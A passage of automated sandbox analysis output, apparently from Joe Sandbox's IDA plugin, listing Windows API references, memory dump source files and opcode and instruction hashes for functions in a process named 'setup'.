                                                                                                    • Instruction Fuzzy Hash: 5EE0657191031CAAC7125F79AD49AAA7AFCA795712F04015BF000D3270DBF45481CF94
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: freemalloc
                                                                                                    • String ID: read$write
                                                                                                    • API String ID: 3061335427-1125055369
                                                                                                    • Opcode ID: ae02aee0a3798f5a7ad56022646c4ad9163d618da48a4e1f630feaad41c88f34
                                                                                                    • Instruction ID: 7641478d529f2f057833125987b0624e5e02c16984a245de8ace4218aab5f5e8
                                                                                                    • Opcode Fuzzy Hash: ae02aee0a3798f5a7ad56022646c4ad9163d618da48a4e1f630feaad41c88f34
                                                                                                    • Instruction Fuzzy Hash: 4CE1FEB4A183028FD710DF69C48061EFBE1BF89354F14892EE998D3392E774E9558F92
                                                                                                    APIs
                                                                                                    • mixerGetNumDevs.WINMM ref: 0023B239
                                                                                                    • mixerGetDevCapsA.WINMM(?,?,00000030), ref: 0023B25F
                                                                                                    • strchr.MSVCRT ref: 0023B277
                                                                                                    • strstr.MSVCRT ref: 0023B29F
                                                                                                    • mixerOpen.WINMM(?,?,00000000,00000000,00000000), ref: 0023B2CB
                                                                                                    • mixerClose.WINMM(?), ref: 0023B2F4
                                                                                                    • mixerClose.WINMM(?), ref: 0023B304
                                                                                                    • __alloca_probe_16.LIBCMT ref: 0023B414
                                                                                                    • mixerGetControlDetailsA.WINMM(?,?,80000001,?), ref: 0023B42D
                                                                                                      • Part of subcall function 00213386: mixerGetLineInfoW.WINMM ref: 002133CC
                                                                                                      • Part of subcall function 00213386: strncpy.MSVCRT ref: 002133F8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: mixer$Close$CapsControlDetailsDevsInfoLineOpen__alloca_probe_16strchrstrncpystrstr
                                                                                                    • String ID:
                                                                                                    • API String ID: 4019791043-0
                                                                                                    • Opcode ID: 4c07e94e10fdb73283103a4756e7a9e9aa33d0b753670dd4fd8726d36db860e7
                                                                                                    • Instruction ID: 84f84d4254cca2fe2c3e475ea40394e415eaa16fe069be165320f5bb9e26e89d
                                                                                                    • Opcode Fuzzy Hash: 4c07e94e10fdb73283103a4756e7a9e9aa33d0b753670dd4fd8726d36db860e7
                                                                                                    • Instruction Fuzzy Hash: 7DA19AB1A20255DBDF22DF64C885ADD7BB9EF09300F20416AFE19DB246D770D8A1CB90
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • basic_string::_M_replace, xrefs: 003012F4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memmove$memcpy
                                                                                                    • String ID: basic_string::_M_replace
                                                                                                    • API String ID: 3033661859-2323331477
                                                                                                    • Opcode ID: 0267b2c806dc77ca3bf30b9e7f388879d929537b2ac5e3ebde3f5056a1146b63
                                                                                                    • Instruction ID: ec40b22a5d856d814165c4950f3a455716a3d882227187c1e2aead2ae8afa585
                                                                                                    • Opcode Fuzzy Hash: 0267b2c806dc77ca3bf30b9e7f388879d929537b2ac5e3ebde3f5056a1146b63
                                                                                                    • Instruction Fuzzy Hash: 77814434A0A3918FC316DF68C4A012AFBE4BF89744F158D1EE8C897391D631E984DF42
                                                                                                    APIs
                                                                                                      • Part of subcall function 00260080: strlen.MSVCRT ref: 0026008D
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 0033297C
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 00332981
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 00332986
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 0033298B
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 00332990
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 00332995
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 0033299C
                                                                                                    • abort.MSVCRT(?,?,00000009,?,?,00000001,00260144), ref: 003329A1
                                                                                                    • abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,00000004,774CDF20,002776AD), ref: 003329A6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: abort$strlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2656325428-0
                                                                                                    • Opcode ID: adc7bdab510be5c3e84a51a28912c3c886dfb9e73630cda4aa0ccb8e40a2afd5
                                                                                                    • Instruction ID: fc2f19efad9fb9c36bf3236b3b84872a50a2f8c1342ba965a6a0dc5890baf032
                                                                                                    • Opcode Fuzzy Hash: adc7bdab510be5c3e84a51a28912c3c886dfb9e73630cda4aa0ccb8e40a2afd5
                                                                                                    • Instruction Fuzzy Hash: 1661AE715263068FDB21CF28C4C176BF7E5AF84300F04891AE8959B355D374EDAAEB92
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _close_dup2$CriticalLeaveSection
                                                                                                    • String ID:
                                                                                                    • API String ID: 2623722825-0
                                                                                                    • Opcode ID: 6933a971744f11d8ea88d90deee7f5ea8855ae6cd5d16ea38f03d51da2ad82ab
                                                                                                    • Instruction ID: 07222a9d29b9007830069b7b74720eac9c1cb3e729089d622f44616c3985c420
                                                                                                    • Opcode Fuzzy Hash: 6933a971744f11d8ea88d90deee7f5ea8855ae6cd5d16ea38f03d51da2ad82ab
                                                                                                    • Instruction Fuzzy Hash: 1841FCB49083489FDB25EF75C0C576A7BE4AF04304F15899EEE898B247E334D890DB46
                                                                                                    APIs
                                                                                                      • Part of subcall function 00247570: VerSetConditionMask.KERNEL32 ref: 002475D9
                                                                                                      • Part of subcall function 00247570: VerSetConditionMask.KERNEL32 ref: 002475F5
                                                                                                      • Part of subcall function 00247570: VerSetConditionMask.KERNEL32 ref: 00247611
                                                                                                    • GetWindowLongW.USER32 ref: 0024AB60
                                                                                                    • SetWindowLongW.USER32 ref: 0024AB7F
                                                                                                    • RedrawWindow.USER32 ref: 0024ABA5
                                                                                                    • CreateRectRgn.GDI32 ref: 0024ABD3
                                                                                                    • DeleteObject.GDI32 ref: 0024AC17
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConditionMaskWindow$Long$CreateDeleteObjectRectRedraw
                                                                                                    • String ID:
                                                                                                    • API String ID: 2142193855-0
                                                                                                    • Opcode ID: 0c643444a070b63de82bd4291ef370024f20074257b7882566e72a06d59f4425
                                                                                                    • Instruction ID: fb79b504c348300bd3e1dac15893d2033086761485875d57603ba7e015dd8bf8
                                                                                                    • Opcode Fuzzy Hash: 0c643444a070b63de82bd4291ef370024f20074257b7882566e72a06d59f4425
                                                                                                    • Instruction Fuzzy Hash: E741A1B18097019FD700AF78DA8931EBBF0FB85315F008A2DE4998B295E7B5D459CB87
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fclosefseek$fopenfreadfreeftellmalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 2780582224-0
                                                                                                    • Opcode ID: 8930a4ed8d50d79c876c20360106582e3d163206f07f3aaa208ed187d31cccc9
                                                                                                    • Instruction ID: ccccca25232754dc5f9c6231ab937303cf544494395383f4ff7726bb57a13cb7
                                                                                                    • Opcode Fuzzy Hash: 8930a4ed8d50d79c876c20360106582e3d163206f07f3aaa208ed187d31cccc9
                                                                                                    • Instruction Fuzzy Hash: 9E2114B1619700ABC710BF69D88525EFBE4EF84364F018D2EF88C8B341EB7599549F82
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Object$Delete$BitsIconInfo
                                                                                                    • String ID: (
                                                                                                    • API String ID: 180008473-3887548279
                                                                                                    • Opcode ID: 537772e6d33ba4026d546e7d74b2832f96c60e0ab14b7d552749b34aa3b873db
                                                                                                    • Instruction ID: 0344d232bf8de050717f992cfa46bb52089e63b106bd75d1a296c5cb69ed8e6f
                                                                                                    • Opcode Fuzzy Hash: 537772e6d33ba4026d546e7d74b2832f96c60e0ab14b7d552749b34aa3b873db
                                                                                                    • Instruction Fuzzy Hash: 9A41BFB19087408FD310EF68D58975FBBF0BF95705F11892EE9888B251E7B5D848CB92
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClientWindow$LongScreen$Rect
                                                                                                    • String ID: 4
                                                                                                    • API String ID: 911421538-4088798008
                                                                                                    • Opcode ID: e28bf4902851a12743601c1d446cb2ddd2f8fd9a53e514a0925a448cb56ef633
                                                                                                    • Instruction ID: 0444550582a8db056369edfd68d48009af2bab34a5c81851e30d75132eac55fa
                                                                                                    • Opcode Fuzzy Hash: e28bf4902851a12743601c1d446cb2ddd2f8fd9a53e514a0925a448cb56ef633
                                                                                                    • Instruction Fuzzy Hash: 254107749083018FCB04EF28D68861ABBF4BF89311F158A2DEC889B315E770D954CF82
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
